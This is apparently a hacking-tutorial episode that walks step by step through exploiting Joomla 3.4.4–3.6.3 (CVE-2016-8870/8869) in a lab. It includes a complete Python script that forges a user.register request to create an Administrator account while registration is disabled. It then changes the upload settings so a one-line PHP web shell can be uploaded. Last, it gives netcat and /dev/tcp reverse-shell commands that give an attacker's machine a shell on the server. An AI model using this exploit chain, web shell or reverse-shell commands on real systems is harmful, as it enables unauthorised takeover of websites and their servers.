In recent weeks the security community has been shaken by two serious vulnerabilities affecting all Joomla versions from 3.4.4 to 3.6.3: CVE-2016-8870 (registration of new users even when registration is disabled) and CVE-2016-8869 (registration with unfiltered group membership). Chained together, they let an unauthenticated attacker create a privileged user and potentially take over the server hosting the Joomla site. In this episode, Gianni shows how to attack a Joomla site, upload a PHP shell, and get full access to the hosting server.
Tools, Scripts, and Exploits
The tools, scripts, and exploits used in this episode of #HackOnTuesday are:
» Joomla 3.6.3 (https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz)
» Security Patch (https://github.com/joomla/joomla-cms/commit/2983d196840a7da2abf62c00ac2f3ee4864179b4)
1. Take a look at the changes/patch
» Go to the GitHub page and click "releases"
» Click 2983d19 and scroll down to see the changes from the previous version
» Most of the changes are in the components/com_users/controllers/user.php file
2. Analyze the “normal” registration process
» Enable “User Registration”
• Login with the admin/password credentials
• Go to System -> Global Configuration -> Users -> User Options and set “Allow User Registration” to “Yes”
» Create a user
• Go to the vulnerable Joomla website
• Click on “Author Login”
• Click on “Don’t have an account?”
• Enable the Burp Proxy
- Run the run_burp.sh script and make sure the Proxy is on.
- Set a proxy in Firefox
- Go to Edit -> Preferences -> Advanced -> Network -> Settings
- Host: 127.0.0.1 / Port: 8080
• Complete the registration form and press “Register”
• Analyze the HTTP Request
- The "option" parameter selects the Joomla component, i.e. the directory under components/ (here com_users)
- The "task" parameter has the form "controller.method": the controller class and the method to be called
- In this case, registration.register calls UsersControllerRegistration::register (controllers/registration.php), which in turn calls the UsersModelRegistration::register model method (models/registration.php)
- cd components/com_users/
- ls -l
- vim models/registration.php
- Before it calls the model, UsersControllerRegistration::register performs a few checks: it verifies the CSRF token and, if "Allow User Registration" is set to "No", it redirects the user to the login page instead of registering the account! See line 114 of the controllers/registration.php file. This is the check the vulnerable code path skips.
3. Analyze the patch
» The patch removes the "register" method from the "UsersControllerUser" class (components/com_users/controllers/user.php). That method only verifies the CSRF token; it never checks whether user registration is allowed, so an attacker can call it to create a new user even when the "Allow User Registration" option is set to "No"! It also hands the posted data to the model unfiltered, which is why the new user can be placed in an arbitrary group (step 5). In particular:
» At line 301, the register method gets the form data.
• $data = $this->input->post->get('user', array(), 'array');
» At line 304, the register method gets the “UsersModelRegistration” model.
• $model = $this->getModel('Registration', 'UsersModel');
» At line 306, the register method gets the registration form.
• $form = $model->getForm();
» At line 315, the form data is validated.
• $return = $model->validate($form, $data);
» At line 346, the register method finalizes the registration using the register method of the “UsersModelRegistration” model.
• $return = $model->register($data);
4. Bypass the registration checks by calling the “register” method of the “User” controller
» Switch off the “Allow User Registration” option.
» Get the index.php/author-login page, view its source and take note of the CSRF token: the hidden input whose name is a 32-character hexadecimal string and whose value is "1". The token is bound to your session, so keep the same session cookie for the forged request.
» Send one of the earlier registration requests to the Burp Repeater and edit it:
• Rename every "jform[...]" parameter to "user[...]" (the vulnerable method reads the "user" array)
• Change "registration.register" to "user.register"
• Change the CSRF token name to the value of the hidden field in the login page (the value stays "1")
• Change the URL to /joomla/index.php?option=com_users&task=user.register and send the request
» Go back to the Admin console and look at the list of users: the new account is there even though registration is disabled. If it shows as blocked, "New User Account Activation" is set to Self or Administrator and the account needs activation before it can log in.
5. Create a privileged user
» Go to Users -> User Groups and look for the ID of the Administrator group.
» Add a "user[groups][]" parameter to the request (groups is an array field) with the ID of the Administrator group, which is 7 by default (Super Users is 8). Send it and check the user list again: the new account is now an Administrator.
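Steps 4 and 5 scripted, as an added example that is not part of the episode's material: the script fetches a Joomla form page, extracts the session-bound CSRF token, and posts the registration fields to task=user.register with user[groups][] set to the Administrator group. The base URL, the login view used to obtain the token, and the credentials are assumptions to adapt to the lab.

```python
import http.cookiejar
import re
import urllib.parse
import urllib.request

ADMIN_GROUP_ID = 7  # Joomla default: 7 = Administrator, 8 = Super Users

# Joomla form token: <input type="hidden" name="<32 hex chars>" value="1" />
TOKEN_RE = re.compile(r'name="([0-9a-f]{32})"\s+value="1"')


def extract_token(html):
    """Return the CSRF token name found in a Joomla form page."""
    match = TOKEN_RE.search(html)
    if match is None:
        raise ValueError("no Joomla form token in page")
    return match.group(1)


def build_register_body(token, username, password, email, group_id=ADMIN_GROUP_ID):
    """Form body for task=user.register.

    Same fields as the normal registration form, but under 'user' instead
    of 'jform' (UsersControllerUser::register reads the 'user' array), plus
    the groups[] field that the vulnerable method passes through unfiltered.
    """
    fields = [
        ("user[name]", username),
        ("user[username]", username),
        ("user[password1]", password),
        ("user[password2]", password),
        ("user[email1]", email),
        ("user[email2]", email),
        ("user[groups][]", str(group_id)),
        (token, "1"),  # CSRF token verified by JSession::checkToken('post')
    ]
    return urllib.parse.urlencode(fields)


def register_admin(base_url, username, password, email, group_id=ADMIN_GROUP_ID):
    """Run the two requests against a live target and return the HTTP status.

    base_url is the Joomla root, e.g. http://192.168.75.140/joomla (assumed).
    A cookie jar keeps the session so the token from the GET is valid for the POST.
    """
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # Any page that renders a form carries the token; the login view always does.
    login = opener.open(base_url + "/index.php?option=com_users&view=login", timeout=10)
    token = extract_token(login.read().decode("utf-8", "replace"))
    body = build_register_body(token, username, password, email, group_id).encode()
    req = urllib.request.Request(
        base_url + "/index.php?option=com_users&task=user.register",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    resp = opener.open(req, timeout=10)
    return resp.status


if __name__ == "__main__":
    # Lab address from the episode; the credentials are made up for the example.
    print(register_admin("http://192.168.75.140/joomla", "hack", "Passw0rd!", "hack@example.com"))
```

Run it with "Allow User Registration" set to "No" and then refresh the user list in the Admin console; the session cookie is what makes the token valid, so sending the POST from a fresh client with a copied token fails the token check.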
6. Upload a PHP Shell
» Go to Content -> Media
» Click Options
» Add pht to "Legal Extensions (File Types)": this lets a PHP file be uploaded without the .php extension, and it only works because the web server still hands .pht to the PHP module (the Debian php5 Apache configuration matches .ph(p[345]?|t|tml))
» Set "Restrict Uploads" and "Check MIME Types" to "No"
» Upload the shell.pht file (its contents are at the end of these notes); it lands in the images/ directory
7. Get reverse shell
» Start a reverse shell listener in the attacker’s machine
• nc -lvp 4444 (on the attacker's machine, 192.168.75.146 in this lab)
» Connect back to the attacker machine by requesting the uploaded shell with the command in the x parameter
• http://192.168.75.140/joomla/images/shell.pht?x=nc 192.168.75.146 4444 -e /bin/bash
• The browser URL-encodes the spaces for you (x=nc%20192.168.75.146%204444%20-e%20/bin/bash); the -e option needs a netcat build that supports it (netcat-traditional), otherwise use another payload such as bash -i >& /dev/tcp/192.168.75.146/4444 0>&1. The HTTP request does not return while the shell is connected.
» Game Over!
shell.pht (the web shell uploaded in step 6; runs the command passed in the x parameter):
<?= system($_GET['x']); ?>
run_burp.sh (starts Burp with a 1 GB heap; used in step 2):
java -jar -Xmx1024m burp.jar